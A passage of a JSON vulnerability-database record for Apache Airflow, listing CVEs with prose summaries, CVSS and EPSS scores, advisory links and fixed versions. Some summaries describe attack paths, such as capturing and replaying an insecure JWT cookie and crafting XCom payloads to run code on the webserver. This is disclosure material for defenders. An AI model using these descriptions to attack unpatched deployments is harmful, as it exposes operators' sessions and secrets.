"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-20T15:56:44Z/" } ], "url": "https://github.com/apache/airflow/pull/63028" }, { "reference_url": "https://github.com/advisories/GHSA-w7cf-2pmc-5m4c", "reference_id": "GHSA-w7cf-2pmc-5m4c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w7cf-2pmc-5m4c" }, { "reference_url": "https://lists.apache.org/thread/tp6kz1hnfb3zsrrtg19myo8x5x80w8r9", "reference_id": "tp6kz1hnfb3zsrrtg19myo8x5x80w8r9", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-20T15:56:44Z/" } ], "url": "https://lists.apache.org/thread/tp6kz1hnfb3zsrrtg19myo8x5x80w8r9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "BIT-airflow-2026-30912", "CVE-2026-30912", "GHSA-w7cf-2pmc-5m4c", "PYSEC-2026-18" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ttb5-juj4-uugt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80719?format=api", "vulnerability_id": "VCID-tx59-fvt4-mbfj", "summary": "Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41017", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04883", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04888", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41017" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/05/31/6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "http://www.openwall.com/lists/oss-security/2026/05/31/6" }, { "reference_url": "https://github.com/apache/airflow/pull/65348", "reference_id": "65348", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:17:50Z/" } ], "url": "https://github.com/apache/airflow/pull/65348" }, { "reference_url": "https://lists.apache.org/thread/9jx0sk49c1250zflx0q3clc717qgjdch", "reference_id": "9jx0sk49c1250zflx0q3clc717qgjdch", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:17:50Z/" } ], "url": "https://lists.apache.org/thread/9jx0sk49c1250zflx0q3clc717qgjdch" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-41017", "CVE-2026-41017", "PYSEC-2026-171" ], "risk_score": 2.6, "exploitability": "0.5", "weighted_severity": "5.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tx59-fvt4-mbfj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94973?format=api", "vulnerability_id": "VCID-typh-t13h-w3g1", "summary": "Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model of Airflow did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model of Airflow are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. This had also been communicated via Airflow 3.2.0 Blog announcement [4].\n\n[1] Security Model: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[2] Workload isolation: https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html \n[3] JWT Token authentication: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[4] Airflow 3.2.0 Blog announcement: https://airflow.apache.org/blog/airflow-3.2.0/ \n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue.", "references": [ { "reference_url": "https://airflow.apache.org/blog/airflow-3.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://airflow.apache.org/blog/airflow-3.2.0" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66236", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26533", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26331", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66236" }, { "reference_url": "https://github.com/advisories/GHSA-j86x-fwp2-qh7v", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j86x-fwp2-qh7v" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-8.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-8.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66236", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66236" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/13/6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/13/6" }, { "reference_url": "https://github.com/apache/airflow/pull/58662", "reference_id": "58662", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:20:26Z/" } ], "url": "https://github.com/apache/airflow/pull/58662" }, { "reference_url": "https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo", "reference_id": "g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:20:26Z/" } ], "url": "https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "BIT-airflow-2025-66236", "CVE-2025-66236", "GHSA-j86x-fwp2-qh7v", "PYSEC-2026-8" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-typh-t13h-w3g1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94804?format=api", "vulnerability_id": "VCID-u2bm-499h-2qfh", "summary": "A vulnerability in Apache Airflow allowed authenticated UI users to view secret values in rendered templates due to secrets not being properly redacted, potentially exposing secrets to users without the appropriate authorization.\n\nUsers are recommended to upgrade to version 3.1.4, which fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66388", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12802", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12712", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66388" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/apache/airflow/pull/58767", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/pull/58767" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2025-86.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2025-86.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2025/12/12/1", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2025/12/12/1" }, { "reference_url": "https://github.com/apache/airflow/pull/58772", "reference_id": "58772", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-15T15:10:01Z/" } ], "url": "https://github.com/apache/airflow/pull/58772" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66388", "reference_id": "CVE-2025-66388", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66388" }, { "reference_url": "https://github.com/advisories/GHSA-fv47-pqh6-wxgq", "reference_id": "GHSA-fv47-pqh6-wxgq", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fv47-pqh6-wxgq" }, { "reference_url": "https://lists.apache.org/thread/mv9hzsx8grjf7gdlkxwppnpbtogtls2g", "reference_id": "mv9hzsx8grjf7gdlkxwppnpbtogtls2g", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-15T15:10:01Z/" } ], "url": "https://lists.apache.org/thread/mv9hzsx8grjf7gdlkxwppnpbtogtls2g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89483?format=api", "purl": "pkg:pypi/apache-airflow@3.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-881f-vbac-rucw" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-u2bm-499h-2qfh" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/36204?format=api", "purl": "pkg:pypi/apache-airflow@3.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.5" } ], "aliases": [ "BIT-airflow-2025-66388", "CVE-2025-66388", "GHSA-fv47-pqh6-wxgq", "PYSEC-2025-86" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u2bm-499h-2qfh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/65750?format=api", "vulnerability_id": "VCID-vnaq-tba8-ykag", "summary": "Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low.\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0, which fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25917", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16146", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1629", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25917" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-13.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-13.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25917", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25917" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/17/9", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/17/9" }, { "reference_url": "https://github.com/apache/airflow/pull/61641", "reference_id": "61641", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-22T03:55:40Z/" } ], "url": "https://github.com/apache/airflow/pull/61641" }, { "reference_url": "https://lists.apache.org/thread/6whgpkqbh12rvpfmvcg8b0vwlv4hq3po", "reference_id": "6whgpkqbh12rvpfmvcg8b0vwlv4hq3po", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-22T03:55:40Z/" } ], "url": "https://lists.apache.org/thread/6whgpkqbh12rvpfmvcg8b0vwlv4hq3po" }, { "reference_url": "https://github.com/advisories/GHSA-6ffj-2wg2-w45j", "reference_id": "GHSA-6ffj-2wg2-w45j", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6ffj-2wg2-w45j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "BIT-airflow-2026-25917", "CVE-2026-25917", "GHSA-6ffj-2wg2-w45j", "PYSEC-2026-13" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vnaq-tba8-ykag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69884?format=api", "vulnerability_id": "VCID-vxqr-wyq5-6yge", "summary": "A bug in the GET `/api/v2/connections/{connection_id}` REST API endpoint in Apache Airflow allowed an authenticated UI/API user with Connection-read permission to retrieve secrets stored in a Connection's `extra` JSON blob under field names not present in the redaction allowlist (`DEFAULT_SENSITIVE_FIELDS`) — for example, official Slack-provider credential field names were returned in plaintext. Affects deployments that store credentials in Connection `extra` blobs and grant Connection-read access to multiple users. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can store sensitive credential values in a secret-backend rather than inlined into the Connection's `extra` field.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45192", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.1204", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12133", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45192" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/06/01/3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "url": "http://www.openwall.com/lists/oss-security/2026/06/01/3" }, { "reference_url": "https://github.com/apache/airflow/pull/66673", "reference_id": "66673", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": 